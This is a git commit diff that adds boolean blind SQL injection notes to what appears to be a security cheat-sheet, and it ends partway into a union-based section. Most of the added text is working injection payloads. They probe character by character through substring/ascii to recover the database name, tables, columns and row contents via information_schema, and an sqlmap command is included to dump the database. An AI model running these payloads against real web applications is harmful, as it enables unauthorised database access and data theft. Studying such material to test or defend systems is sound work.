added boolean blind information
This commit is contained in:
parent
1e166ee37e
commit
4c16a2a545
|
@ -57,22 +57,66 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
|
|||
|
||||
### Blind injection
|
||||
|
||||
* A blind injection methods tries to guess characters not by returned values but by how the DB behaves to your request
|
||||
A blind injection methods tries to guess characters not by returned values
|
||||
but by how the DB behaves to your request
|
||||
|
||||
```sh
|
||||
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
|
||||
```
|
||||
|
||||
```sh
|
||||
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
|
||||
```
|
||||
|
||||
* Function substr(string, start, length)
|
||||
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
|
||||
|
||||
__How do you go forward when you know, that there is a possible boolean blind injection?__
|
||||
|
||||
You want to get
|
||||
|
||||
* Database name
|
||||
* Table name
|
||||
* Column name
|
||||
|
||||
and watch out for return values, status codes, if you are logged in a session
|
||||
inside the browser, etc., ... .
|
||||
|
||||
Start at the databasename character on position 1, after that 2 and so on via a
|
||||
POST request
|
||||
|
||||
```sql
|
||||
username=admin'+and+substring(database(),1,1)="a"+#&password='
|
||||
username=admin'+and+substring(database(),2,1)="b"+#&password='
|
||||
```
|
||||
|
||||
Next, find the characters of the tablename via
|
||||
|
||||
```sql
|
||||
username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema="<found_databasename>"+limit+0,1),1,1)+=+"a"+#&password='
|
||||
username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema="<found_databasename>"+limit+0,1),2,1)+=+"b"+#&password='
|
||||
```
|
||||
|
||||
Find the column_name of the table
|
||||
|
||||
```sql
|
||||
username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name="<found_tablename>"+limit+0,1),1,1)+=+"a"+#&password='
|
||||
username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name="<found_tablename>"+limit+0,1),2,1)+=+"b"+#&password='
|
||||
```
|
||||
|
||||
Query content of the table and columns found via
|
||||
|
||||
```sql
|
||||
username=admin'+and+substring((select+<found_columnname>+from+<found_tablename>+limit+0,1),1,1)="a"+#&password='
|
||||
```
|
||||
|
||||
### Union based
|
||||
|
||||
Union based injections is an incremental and cautios approach.
|
||||
Start by trying to provoke errors to validate a possible injection.
|
||||
|
||||
* __First method__ check by order until error occurs
|
||||
|
||||
```sql
|
||||
' order by 1 -- -
|
||||
' order by 2 -- -
|
||||
|
|
Loading…
Reference in New Issue